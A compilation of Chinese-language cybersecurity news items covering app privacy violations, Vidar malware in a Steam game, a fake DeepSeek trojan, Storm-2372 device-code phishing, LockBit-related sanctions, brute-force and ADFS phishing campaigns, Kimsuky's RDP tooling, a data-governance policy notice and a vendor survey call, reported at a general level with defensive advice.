9、《普益基金》（版本7.0.3，应用宝） 10、《i音乐》（版本10.5.2.0，vivo应用商店） 三、个人信息处理者向其他个人信息处理者提供其处理的个人信息的，未向个人告知接收方的名称或者姓名、联系方式、处理目的、处理方式和个人信息的种类，并取得个人的单独同意。涉及4款移动应用如下： 1、《鲸鱼爱学》（版本3.1.0，应用宝）、 2、《江子为民》（版本1.1.54，应用宝） 3、《乐山商业银行》（版本3.31.6，应用宝） 4、《i音乐》（版本10.5.2.0，vivo应用商店） 四、未提供有效的注销用户账号功能。涉及1款移动应用如下： 1、《运多星司机》（版本1.2.6，应用宝） 五、未向用户提供撤回同意收集个人信息的途径、方式；基于个人同意处理个人信息的，个人有权撤回其同意。个人信息处理者未提供便捷的撤回同意的方式。涉及7款移动应用如下： 1、《运多星司机》（版本1.2.6，应用宝） 2、《天利测亩仪》（版本2.0.23，vivo应用商店） 3、《艾乐游》（版本1.3.3，百度手机助手） 4、《易念》（版本3.0.2，应用宝） 5、《同城酒库》（版本3.2.9，vivo应用商店） 6、《乐山商业银行》（版本3.31.6，应用宝） 7、《i音乐》（版本10.5.2.0，vivo应用商店） 六、处理敏感个人信息未取得个人的单独同意。涉及3款移动应用如下： 1、《运多星司机》（版本1.2.6，应用宝） 2、《乐山商业银行》（版本3.31.6，应用宝） 3、《i音乐》（版本10.5.2.0，vivo应用商店） 七、个人信息处理者处理不满十四周岁未成年人个人信息的，未制定专门的个人信息处理规则；收集未成年人信息未取得监护人单独同意。涉及3款移动应用如下： 1、《元气桌面壁纸》（版本3.52.4324，vivo应用商店） 2、《同城酒库》（版本3.2.9，vivo应用商店） 3、《i音乐》（版本10.5.2.0，vivo应用商店） 八、个人信息处理者未根据个人信息的处理目的、处理方式、个人信息的种类以及对个人权益的影响、可能存在的安全风险等，采取相应的加密、去标识化等安全技术措施。涉及2款移动应用如下： 1、《贝壳找房 | 二手房新房租房装修》（版本9.91.2，微信小程序） 2、《微医健康平台》（版本1.04，微信小程序） 针对上述情况，国家计算机病毒应急处理中心提醒广大手机用户首先谨慎下载使用以上违规移动应用，同时要注意认真阅读其用户协议和隐私政策说明，不随意开放和同意不必要的隐私权限，不随意输入个人隐私信息，定期维护和清理相关数据，避免个人隐私信息被泄露。 文中所列移动应用检测时间为2024年12月18日至2025年2月8日。 文章来源自：国家计算机病毒应急处理中心

最新发现，Steam商店中一款名为PirateFi的免费游戏一直在向用户传播Vidar信息窃取恶意软件。 在2月6日至2月12日期间，这款游戏在Steam目录中出现了近一周的时间，并被多达1500名用户下载。分发服务正在向可能受到影响的用户发送通知，建议他们重新安装Windows。 Steam上的恶意软件 上周，Seaworth Interactive在Steam上发布了《PirateFi》，并获得了积极评价。它被描述为一款以低多边形世界为背景的生存游戏，涉及基地建设、武器制作和食物收集。 PirateFi的Steam页面 本周，Steam发现这款游戏含有恶意软件，但并未指明具体类型。通知中写道：“这款游戏开发者的Steam账户上传了包含可疑恶意软件的构建。” 用户在Steam上玩PirateFi（3476470）时，这些构建是活跃的，所以这些恶意文件很可能在用户的计算机上启动。Steam建议用户使用最新的防病毒软件运行完整的系统扫描，检查他们不认识的新安装的软件，并考虑操作系统格式。 Steam对受影响用户的通知 受影响的用户还在游戏的Steam社区页面上发布了安全提醒，通知其他人不要启动该游戏，因为他们的杀毒软件将其识别为恶意软件。 SECUINFRA Falcon Team的Marius Genheimer获得了通过PirateFi传播的恶意软件样本，并将其识别为Vidar伪造软件的一个版本。 SECUINFRA建议：“如果你是下载这个“游戏”的玩家之一：考虑保存在浏览器、电子邮件客户端、加密货币钱包等中的凭据、会话cookie和秘密被泄露。”建议用户更改所有可能受影响帐户的密码，并在可能的情况下激活多因素身份验证保护。 基于动态分析和YARA签名匹配，该恶意软件被识别为Vidar，隐藏在一个名为Pirate.exe的文件中，作为有效载荷（Howard.exe），与InnoSetup安装程序打包在一起。 攻击者多次修改游戏文件，使用各种混淆技术，并更改命令和控制服务器以获取凭据。研究人员认为，PirateFi名称中提到的web3/ b区块链/加密货币是有意为之，目的是吸引特定的玩家群体。 Steam并没有公布有多少用户受到了PirateFi恶意软件的影响，但游戏页面上的统计数据显示，可能有多达1500人受到了影响。 恶意软件渗透Steam商店并不常见，但也不是没有先例。在2023年2月，Steam用户受到了恶意Dota 2游戏模式的攻击，该模式利用Chrome n-day漏洞在玩家的计算机上执行远程代码执行。 2023年12月，当时很受欢迎的独立策略游戏《Slay the Spire》的一个mod被黑客入侵，黑客将“Epsilon”信息传输器注入其中。 目前Steam已经引入了其他措施，如开启短信验证等，以保护玩家免受未经授权的恶意更新，但PirateFi的案例表明，目前这些措施还远远不够。

近日，国家计算机病毒应急处理中心和计算机病毒防治技术国家工程实验室依托国家计算机病毒协同分析平台在我国境内捕获发现仿冒DeepSeek官方App的安卓平台手机木马病毒。 相关病毒样本信息 用户一旦点击运行仿冒App，该App会提示用户“需要应用程序更新”，并诱导用户点击“更新”按钮。用户点击后，会提示安装所谓的“新版”DeepSeek应用程序，实际上是包含恶意代码的子安装包，并会诱导用户授予其后台运行和使用无障碍服务的权限。 诱导用户“更新”（左上）、诱导用户安装“带毒”子安装包（右上）、诱导用户授权其后台运行（左下）、诱导用户授权其使用无障碍功能（右下）。 同时，该恶意App还包含拦截用户短信、窃取通讯录、窃取手机应用程序列表等侵犯公民个人隐私信息的恶意功能和阻止用户卸载的恶意行为。经分析，该恶意App为金融盗窃类手机木马病毒的新变种。网络犯罪分子很可能将该恶意App用于电信网络诈骗活动，诱使用户从非官方渠道安装仿冒DeepSeek的手机木马，从而对用户的个人隐私和经济利益构成较大威胁。 除仿冒DeepSeek安卓客户端的“DeepSeek.apk”之外，国家计算机病毒协同分析平台还发现了多个文件名为“DeepSeek.exe”“DeepSeek.msi”和“DeepSeek.dmg”的病毒样本文件，由于DeepSeek目前尚未针对Windows平台和MacOS平台推出官方客户端程序，因此相关文件均为仿冒程序。由此可见，网络犯罪分子已经将仿冒DeepSeek作为传播病毒木马程序的新手法。预计未来一段时间内，包括仿冒DeepSeek在内的各种人工智能应用程序的病毒木马将持续增加。 国家计算机病毒应急处理中心发布防范措施 针对该款手机木马病毒，国家计算机病毒应急处理中心发布以下防范措施： ·不要从短信、社交媒体软件、网盘等非官方渠道传播的网络链接或二维码下载App，仅通过DeepSeek官方网站或正规手机应用商店下载安装相应App。 ·保持手机预装的安全保护功能或第三方手机安全软件处于实时开启状态，并保持手机操作系统和安全软件更新到最新版本。 ·在手机使用过程中，谨慎处理非用户主动发起的App安装请求，一旦发现App在安装过程中发起对设备管理器、后台运行和使用无障碍功能等权限请求，应一律予以拒绝。 ·如遭遇安装后无法正常卸载的App程序，应立即备份手机中的通讯录、短信、照片、聊天记录和文档文件等重要数据，在手机生产商售后服务人员或专业人员的指导下对手机进行安全检测和恢复。同时密切关注本人的社交媒体类软件和金融类软件是否具有异常登录信息或异常操作信息，以及亲友是否收到由本人手机号或社交媒体软件发送的异常信息，一旦出现上述相关情况，应及时联系相关软件供应商和亲友说明有关情况。 ·警惕和防范针对流行App软件的电信网络诈骗话术，如“由于XXX软件官方网站服务异常，请通过以下链接下载官方应用程序”“由于XXX软件更新到最新版本，需要用户重新授予后台运行和无障碍功能权限”等，避免被网络犯罪分子诱导。 ·对已下载的可疑文件，可访问国家计算机病毒协同分析平台进行上传检测。 文章来源自：央视新闻

据安全研究员观察发现，一个可能与俄罗斯有关联的威胁者发起的活跃攻击活动，正利用设备代码钓鱼手段针对个人微软 365 账户进行攻击。 这些攻击目标涉及欧洲、北美、非洲和中东地区的政府、非政府组织、信息技术服务和科技、国防、电信、医疗以及能源/石油和天然气行业。 微软威胁情报中心将此次设备代码钓鱼活动背后的威胁者追踪为“风暴-237”。基于受害者特征和作案手法，研究人员认为，该活动与符合俄罗斯利益的国家行为有关。 设备代码钓鱼攻击 输入受限设备——那些缺少键盘或浏览器支持的设备，比如智能电视和某些物联网设备，依靠代码认证流程让用户通过在另一台设备（如智能手机或电脑）上输入授权码来登录应用程序。 微软研究人员发现，自去年 8 月以来，Storm-2372 通过诱骗用户在合法的登录页面输入攻击者生成的设备代码，滥用这种身份验证流程。 这些特工人员首先通过在 WhatsApp、Signal 和 Microsoft Teams 等消息平台上“冒充与目标有关的知名人士”与目标建立联系，然后才发起攻击。 Storm-2372发送到目标的消息 威胁者会在通过电子邮件或短信发送虚假的在线会议邀请之前，与受害者逐渐建立起一种融洽的关系。根据研究人员的说法，受害者收到一个团队会议邀请，其中包括攻击者生成的设备代码。 微软表示：“这些邀请会引诱用户完成设备代码认证请求，模拟消息传递服务，这为Storm-2372提供了对受害者账户的初始访问权限，并启用了Graph API数据收集活动，如电子邮件收集。” 只要被盗的令牌有效，黑客就可以在不需要密码的情况下访问受害者的微软服务（电子邮件、云存储）。 设备代码网络钓鱼攻击概述 然而，微软表示，攻击者现在正在设备代码登录流中使用Microsoft Authentication Broker的特定客户端ID，这允许他们生成新的令牌。 这开启了新的攻击和持久化可能性，因为攻击者可以使用客户端ID将设备注册到微软基于云的身份和访问管理解决方案Entra ID。 使用相同的刷新令牌和新的设备标识，Storm-2372能够获得主刷新令牌（PRT）并访问其资源。目前已经观察到Storm-2372使用连接的设备收集电子邮件。 防御风暴2372 为了对抗Storm-2372使用的设备代码钓鱼攻击，微软建议在可能的情况下阻止设备代码流，并在微软Entra ID中执行条件访问策略，以限制其对可信设备或网络的使用。 如果怀疑设备代码网络钓鱼，立即使用‘revokeSignInSessions’撤销用户的刷新令牌，并设置条件访问策略来强制受影响的用户重新认证。 最后，使用Microsoft Entra ID的登录日志来监视并快速识别短时间内大量的身份验证尝试、来自无法识别的ip的设备代码登录，以及发送给多个用户的设备代码身份验证的意外提示。

近期，美国、澳大利亚和英国制裁了俄罗斯防弹主机（BPH）服务提供商Zservers，原因是该公司为LockBit勒索软件团伙提供必要的攻击基础设施。 该公司的两名主要管理人员是俄罗斯公民，他们也因指导Lockbit虚拟货币交易和支持该团伙的攻击而被指控。 美国外国资产控制办公室（OFAC）表示，加拿大当局在2022年对一家已知的LockBit附属公司的突袭中发现了一台运行虚拟机的笔记本电脑，该虚拟机与Zservers转租的IP地址相连，并运行LockBit恶意软件控制面板。 2022年，一名俄罗斯黑客从Zservers获得了IP地址，这些地址可能与LockBit聊天服务器一起用于协调勒索软件活动，而在2023年，Zservers向LockBit附属公司提供了包括俄罗斯IP地址在内的基础设施。 美国财政部负责恐怖主义和金融情报的代理副部长表示：“勒索软件攻击者和其他网络犯罪分子依靠第三方网络服务提供商（如Zservers）来攻击美国和国际关键基础设施。”并称这些托管服务提供商‘刀枪不入’是一种虚假的营销噱头。网络犯罪分子认为他们有这些服务提供商的保护，然而，一次大规模行动打开并破坏了基础设施。 像ZSERVERS这样的BPH提供商提供一系列可购买的工具来掩盖网络犯罪分子的位置、身份和活动，从而保护和支持网络犯罪分子。以这些供应商为目标可以同时挫败数百或数千名罪犯。 英国外交、联邦和发展办公室还制裁了Zservers在英国的幌子公司XHOST Internet Solutions LP和四名员工，同样因为他们支持LockBit勒索软件攻击。 在这些制裁之后，这三个国家的公民被禁止与被指认的个人和公司进行交易。与他们有关的所有资产也将被冻结，与他们有交易的金融机构和外国实体也可能面临处罚。 在制裁之前，美国国务院为LockBit勒索软件管理员提供了高达1000万美元的奖赏，并为LockBit勒索软件所有者、运营商、管理员和附属机构提供了高达1500万美元的悬赏。 LockBit被逮捕和指控 去年12月，美国司法部还指控一名俄罗斯-以色列双重国籍人士涉嫌开发恶意软件并管理LockBit勒索软件的基础设施。 此前与Lockbit勒索软件有关的网络罪犯的指控和逮捕包括：2023年5月的Mikhail Pavlovich Matveev（又名Wazawaka）， 2024年2月的Artur Sungatov和Ivan Gennadievich Kondratiev（又名Bassterlord），以及2024年5月的Dmitry Yuryevich Khoroshev（又名LockBitSupp和putinkrab）。 今年7月，一俄罗斯公民和加拿大公民也承认，他们作为LockBit的附属机构参与了至少12起勒索软件攻击。 LockBit于2019年9月浮出水面，此后声称与针对全球许多知名实体的攻击有关，包括美国银行、波音公司、大陆汽车巨头、英国皇家邮政和意大利国税局等。 2024年2月，Cronos行动关闭了LockBit的基础设施，并查封了34台服务器，其中包含2500多个解密密钥，后来用于创建免费的LockBit 3.0黑色勒索软件解密器。

暴力破解攻击是指威胁者尝试使用大量用户名和密码反复登录一个账户或设备，直到找到正确的组合。一旦他们获取到正确的凭证，就可以利用这些凭证劫持设备或访问网络。 据悉，一场动用了近 280 万个 IP 地址的大规模暴力破解密码攻击正在进行，该攻击试图验证包括Palo Alto Networks，Ivanti和Sonicwall在内的众多网络设备的登录凭证。 根据威胁监控平台Shadowserver基金会的说法，自上个月以来，一直有暴力破解攻击在进行，每天使用近 280 万个源 IP 地址来实施这些攻击。这 110 万人中，大多数来自巴西，其次是土耳其、俄罗斯、阿根廷、摩洛哥和墨西哥，但参与该活动的原籍国数量总体上非常多。 这些边缘安全设备，如防火墙、vpn、网关和其他安全设备，通常暴露在互联网上以方便远程访问。进行这些攻击的设备主要是MikroTik、Cisco、Boa的路由器和物联网，这些设备通常会受到大型恶意软件僵尸网络的攻击。 据Shadowserver基金会证实，该活动已经持续了一段时间，但最近捕捉到数量大幅增加。据了解，攻击IP地址分布在许多网络和自治系统中，可能是僵尸网络或与住宅代理网络相关的某些操作。 住宅代理是分配给互联网服务提供商（isp）的消费者的IP地址，这使得它们在网络犯罪、抓取、绕过地理限制、广告验证、倒卖球鞋或门票等方面受到高度追捧。 这些代理通过住宅网络路由互联网流量，使用户看起来像是普通的家庭用户，而不是机器人、数据抓取器或黑客。 网关设备（例如那些被此活动作为目标的设备）可以用作住宅代理操作中的代理出口节点，通过企业网络路由恶意流量。这些节点被认为是“高质量的”，因为有良好的声誉，攻击更难以检测和阻止。 保护边缘设备免受强制攻击的步骤包括将默认管理密码更改为强大且唯一的密码，实施多因素身份验证（MFA），使用受信任ip的允许列表，以及禁用不需要的web管理界面。 最后，在这些设备上应用最新的固件和安全更新对于消除漏洞至关重要，威胁者可以利用这些漏洞获得初始访问权限。 去年4月，Cisco就针对Cisco、CheckPoint、Fortinet、SonicWall和Ubiquiti等全球设备的大规模凭证强制破解活动发出了警告。12月，Citrix还警告了针对Citrix NetScaler设备的密码喷雾攻击。

服务台网络钓鱼活动主要针对Microsoft Active Directory Federation Services（ADFS），使用欺骗性的登录页面来窃取凭据和绕过多因素身份验证（MFA）保护措施。据发现该攻击的安全公司称，此次攻击的目标主要是教育、医疗和政府机构，攻击目标至少有150个。 这些攻击旨在访问公司电子邮件帐户，以将电子邮件发送给组织内的其他受害者或进行经济攻击（例如商业电子邮件妥协（BEC）），在此付款转移到威胁者的帐户中。 欺骗Microsoft Active Directory联合服务 Microsoft Active Directory Federation Services（ADFS）是一个身份验证系统，允许用户登录一次并访问多个应用程序和服务，而无需重复输入其凭据。它通常在大型组织中用于在基于内部和云的应用程序中提供单登录（SSO）。 攻击者会向冒充其公司IT团队的目标发送电子邮件，要求他们登录以更新其安全设置或接受新策略。 攻击中使用的网络钓鱼电子邮件示例 点击“嵌入式”按钮会将受害者带到一个看起来与他们组织的真实ADFS登录页面一模一样的网络钓鱼网站。网络钓鱼页面要求受害人输入其用户名，密码和MFA代码，或引导他们批准推送通知。 欺骗的ADFS门户 网络钓鱼模板还包括基于组织配置的MFA设置来捕获验证目标帐户所需的特定第二因素的表单，针对多种常用MFA机制的异常观察到的模板，包括Microsoft Authenticator，Duo Security和SMS验证。 两个可用的MFA旁路屏 一旦受害者提供了所有详细信息，他们就会被重定向到合法的登录页面，以减少怀疑，并使其看起来好像这个过程已经成功完成。 同时，攻击者立即利用窃取的信息登录受害者的帐户，窃取任何有价值的数据，创建新的电子邮件过滤规则，并尝试横向网络钓鱼。 安全公司表示，攻击者在这次活动中使用私人互联网接入VPN来掩盖他们的位置，并分配一个更接近组织的IP地址。 即使这些网络钓鱼攻击并没有直接违反ADF，而是依靠社会工程来工作，但由于许多用户对登录工作流的固有信任，该策略仍然是具有潜在有效性的。 安全工作人员建议相关企业应迁移到现代和更安全的解决方案，如Microsoft Entra，并引入额外的电子邮件过滤器和异常活动检测机制，以尽早阻止网络钓鱼攻击。

国家发展改革委等部门印发《关于完善数据流通安全治理 更好促进数据要素市场化价值化的实施方案》的通知 发改数据〔2025〕18号 各省、自治区、直辖市、新疆生产建设兵团发展改革委、数据管理部门、党委网信办、工业和信息化主管部门、公安厅（局）、市场监管局（厅、委）： 为深入贯彻党中央、国务院决策部署，落实《中华人民共和国网络安全法》《中华人民共和国数据安全法》《中华人民共和国个人信息保护法》《关键信息基础设施安全保护条例》《网络数据安全管理条例》，推动高质量发展和高水平安全良性互动，国家发展改革委、国家数据局、中央网信办、工业和信息化部、公安部、市场监管总局制定了《关于完善数据流通安全治理 更好促进数据要素市场化价值化的实施方案》，现印发给你们，请结合实际抓好落实。 国家发展改革委 国家数据局 中央网信办 工业和信息化部 公安部 市场监管总局 2025年1月6日 关于完善数据流通安全治理 更好促进数据要素市场化价值化的实施方案 数据流通安全治理规则是数据基础制度的重要内容。为贯彻党中央、国务院决策部署，落实《中华人民共和国网络安全法》《中华人民共和国数据安全法》《中华人民共和国个人信息保护法》《关键信息基础设施安全保护条例》《网络数据安全管理条例》，更好统筹发展和安全，建立健全数据流通安全治理机制，提升数据安全治理能力，促进数据要素合规高效流通利用，释放数据价值，提出如下意见。 一、总体要求 以习近平新时代中国特色社会主义思想为指导，深入落实党的二十大和二十届二中、三中全会精神，全面贯彻总体国家安全观，统筹数据高质量发展和高水平安全，坚持系统思维、底线思维，将安全贯穿数据供给、流通、使用全过程，落实国家数据分类分级保护制度，明晰数据流通中的安全治理规则，加强数据流通安全技术应用和产业培育，完善权益保护和责任界定机制，提升安全治理能力，防范数据滥用风险，坚决维护国家安全，保护个人信息和商业秘密，以成本最小化实现安全最优化，推动数据高质量发展和高水平安全良性互动，充分释放数据价值，促进数据开发利用。到2027年底，规则明晰、产业繁荣、多方协同的数据流通安全治理体系基本构建，数据合规高效流通机制更加完善，治理效能显著提升，为繁荣数据市场、释放数据价值提供坚强保障。 二、主要任务 （一）明晰企业数据流通安全规则。支持企业通过编制数据资源目录、分析流通过程安全风险、制定分类分级保护措施等方式，提升数据治理能力。鼓励企事业单位设立首席数据官，加强数据治理和数据开发利用。数据处理者应按照国家有关规定识别、申报重要数据，并依法接受监管部门的监督检查。对确认为重要数据的，相关地区、部门应当及时向数据处理者告知或公开发布。数据处理者对外提供重要数据时，应按照相关法律法规、行业主管部门要求，采取必要的安全保护措施，切实维护国家安全、经济运行、社会稳定、公共健康和安全。鼓励开展数据脱敏等研究，对于经脱敏等技术处理后，依据所属行业领域的分类分级标准规范重新识别为一般数据的，可按照一般数据开展流通交易。 （二）加强公共数据流通安全管理。政务数据共享过程中，数据提供方按照“谁主管、谁提供、谁负责”的原则，明确政务数据共享范围、用途、条件，承担数据提供前的安全管理责任，探索建立数据接收方数据安全管理风险评估制度，确保数据在安全前提下有序共享。数据接收方按照“谁经手、谁使用、谁管理、谁负责”的原则，承担数据接收后的安全管理责任。有关地方和部门开展公共数据授权运营的，应依据有关要求明确公共数据授权运营机构的安全管理责任，建立健全数据安全管理制度，采取必要安全措施，加强关联风险识别和管控，保护公共数据安全。 （三）强化个人数据流通保障。完善个人数据权益保障机制。对于个人数据流通，应当依法依规取得个人同意或经过匿名化处理，不得通过强迫、欺诈、误导等方式取得个人同意。制定个人信息匿名化相关标准规范，明确匿名化操作规范、技术指标和流通环境要求。鼓励采用国家网络身份认证公共服务等多种方式，强化个人信息保护。健全个人信息保护投诉、举报、受理、处置渠道。 （四）完善数据流通安全责任界定机制。数据提供方应当确保数据来源合法，数据接收方应严格按照要求使用数据，防止超范围使用。鼓励供需双方在数据流通交易合同中约定各自权责范围，清晰界定权责边界。探索建立数据流通安全审计和溯源机制，融合应用数字水印、数据指纹、区块链等技术手段，高效支撑数据流通过程中的取证和定责。支持在自由贸易试验区（港）等地方开展先行先试，围绕数据流通交易溯源机制、重点场景安全治理标准、重点场景安全责任界定机制等，探索新型治理模式，提高治理效能。 （五）加强数据流通安全技术应用。支持数据流通安全技术创新，完善数据流通安全标准，引导企业按照数据分类分级保护要求，采取不同的安全技术开展数据流通。对于不涉及风险问题的一般数据，鼓励自行采取必要安全措施进行流通利用。对于未认定为重要数据，但企业认为涉及重要经营信息的，鼓励数据提供方、数据接收方接入和使用数据流通利用基础设施，促进数据安全流动。对于重要数据，在保护国家安全、个人隐私和确保公共安全的前提下，鼓励通过“原始数据不出域、数据可用不可见、数据可控可计量”等方式，依法依规实现数据价值开发。 （六）丰富数据流通安全服务供给。繁荣数据安全服务市场，壮大数据安全治理服务规模，创新数据安全服务业态。支持数据安全服务机构加强基础理论研究、核心技术攻关和产品创新应用，向规模化、专业化、一体化方向发展，提升安全服务效能，降低应用成本。培育数据流通安全检测评估、安全审计等服务，健全有利于数据流通主体互信的市场化机制。丰富数据托管等服务供给，研究探索为数据安全提供保险保障的可行方案，鼓励有条件的企业拓展面向中小企业的数据安全托管服务。 （七）防范数据滥用风险。依法严厉打击非法获取、出售或提供数据的黑灰产业，加强敏感个人信息保护，限制超出授权范围使用个人信息。依法依规惩处利用数据开展垄断、不正当竞争等行为，维护各方主体权益和市场公平竞争秩序。在国家数据安全工作协调机制统筹协调下，加强重点行业领域数据安全风险监测，持续增强风险分析、监测和处置能力，防范发生系统性、大范围数据安全风险，维护国家安全和经济社会稳定。研究完善数据流通安全事故或纠纷处置机制，提升流通风险应对能力。 强化部门协同，加强数据安全、个人信息保护等方面的执法协同，推动行政执法信息共享、情况通报和协同配合，提高监管效能。组织发布数据流通安全治理典型案例，充分发挥示范作用，营造“一地创新、全国共享”“一企创新、多企复用”的创新环境，促进数据安全有序流通。 文章来源自：国家发展改革委

被称为Kimsuky的朝鲜黑客组织在最近的攻击中被发现使用定制的RDP包装器和代理工具直接访问受感染的机器。 发现该活动的AhnLab安全情报中心（ASEC）表示，朝鲜黑客现在正使用一套多样化的定制远程访问工具，而不再仅仅依赖于PebbleDash等嘈杂的后门，但PebbleDash目前仍在使用中，此举也是Kimsuky改变策略的手段之一。 Kimsuky最新的攻击链 最新的感染链始于一封鱼叉式网络钓鱼电子邮件，其中包含伪装成PDF或Word文档的恶意快捷方式（. lnk）文件附件。这些电子邮件包含收件人的姓名和正确的公司名称，表明Kimsuky在攻击前进行了侦察。 打开.LNK文件会触发PowerShell或Mshta从外部服务器检索额外的负载，包括： ·PebbleDash，一个已知的Kimsuky后门，提供初始系统控制。 ·一个修改版本的开源RDP包装工具，支持持久的RDP访问和安全措施绕过。 ·代理工具绕过私有网络的限制，允许攻击者访问系统，即使直接RDP连接被阻止。 自定义RDP包装器 RDP Wrapper是一个合法的开源工具，用于在Windows版本（如Windows Home）上启用本地不支持的远程桌面协议（RDP）功能。 它充当中间层，允许用户在不修改系统文件的情况下启用远程桌面连接。Kimsuky的版本改变了导出功能，以绕过反病毒检测，并可能区分其行为，足以逃避基于签名的检测。 自定义RDP包装器导出功能 使用自定义RDP包装器的主要优点是规避检测，因为RDP连接通常被视为合法的，允许Kimsuky在雷达下停留更长时间。 此外，与通过恶意软件进行shell访问相比，它提供了更舒适的基于gui的远程控制，并且可以通过中继绕过防火墙或NAT限制，允许从外部进行RDP访问。 ASEC报告说，一旦Kimsuky在网络上站稳脚跟，他们就会放弃二次有效载荷。其中包括一个键盘记录器，它捕获击键并将其存储在系统目录中的文本文件中，一个infostealer（强制复制）提取保存在web浏览器上的凭据，以及一个基于powershell的ReflectiveLoader，它允许在内存中执行有效负载。 整体来看，Kimsuky作为一个持续不断的威胁，也是朝鲜致力于收集情报最多产的网络间谍威胁组织之一。根据ASEC的最新发现表明，其威胁组织正转向更隐蔽的远程访问方法，以延长在受损网络中的停留时间。

在当今数字化深度渗透的时代，网络已然成为经济、社会、生活运转的关键支撑。从金融交易、政务办公到日常的社交娱乐，人们的一切活动都与网络紧密相连。然而，繁荣的网络生态背后，网络安全形势却日益严峻。网络攻击手段日益复杂多变，勒索软件、高级持续性威胁（APT）等层出不穷，与此同时，云计算、大数据、物联网等新技术广泛应用，网络安全面临着前所未有的挑战与全新需求。 为紧跟网络安全领域的快速发展步伐，嘶吼安全产业研究院决定对《网络安全产业图谱》进行更新。在各领域新兴技术不断涌现，尤其是 AI 与网络安全深度融合的背景下，我们将重新调整分类网络安全产业链。比如，专门划分出 AI 赋能网络安全的相关细分领域。进一步优化网安产业布局，为政企及其他组织机构提供更具前瞻性和实用价值的客观参考。 图谱调整说明： 1、各细分领域精简收录企业数量： 本次图谱调研将延续2024年图谱收录方式，参考细分产品营收、营收增长率、客户数量、投入占比、品牌影响力等多个维度，对企业进行全面能力评估，重点收录综合能力较高的企业，为行业用户提供更精准的行业参考指南。 2、热门领域Top10厂商推荐： 在精选出的多个热门领域中，我们将根据调研结果评选出Top10优秀安全厂商，进行单独呈现。 3、重点领域厂商产品名录展示： 在精选出的多个重点领域中，我们将根据调研结果展示重点领域安全产品名录。 《2025网络安全产业图谱》调研通知： 图谱调研表获取方式：关注嘶吼专业版公众号，回复“2025图谱调研”获取。 1）征集阶段：2025年2月10日——2025年3月7日，下载填报《2025网络安全产业图谱调研表》，并发送至收集邮箱中。 2）分析阶段：根据回收的问卷，嘶吼分析师团队会针对厂商提交材料进行复核，部分厂商可能需要接受验证或者访谈，以便对存疑问题进行沟通。 3）图谱报告发布：《2025网络安全产业图谱》由嘶吼安全产业研究院官方发布。内容将呈现部分细分领域数据统计，根据实际调研结果，撰写包括网络安全产业情况、调研发现等相关内容。 填写说明： 1 请按说明要求填写，方便后续整理数据，请注意，不要自行添加或删减行列！ 2 提交时请务必在附件中添加（ai格式）公司logo。 3 请于3月7日前提交问卷，发送至邮箱shankala@4hou.com。 4 务必客观、真实填写该问卷。 声明： · 此次收集的调研数据，将由嘶吼安全产业研究院全程严格管理。每一个样本数据仅作为综合统计分析的素材，本次调研有可对外展示资料填写，调研表中已明确标注，填写时请提交脱敏资料。其他未标注对外展示填写项目，均不会泄露和公布，请参与调研的每位负责人安心填写。 · 《2025网络安全产业图谱调研表》仅为调研资料收集，图谱最终呈现分类与形式，将以正式发布内容为准。 在此，我们要郑重的感谢所有参与到嘶吼图谱绘制的各家厂商，不论是网络框架梳理到内容划分调整，亦或是申请入驻、参与对细分领域的调研等环节，行业同仁都对我们提供了莫大的帮助。再次表示诚挚的感谢！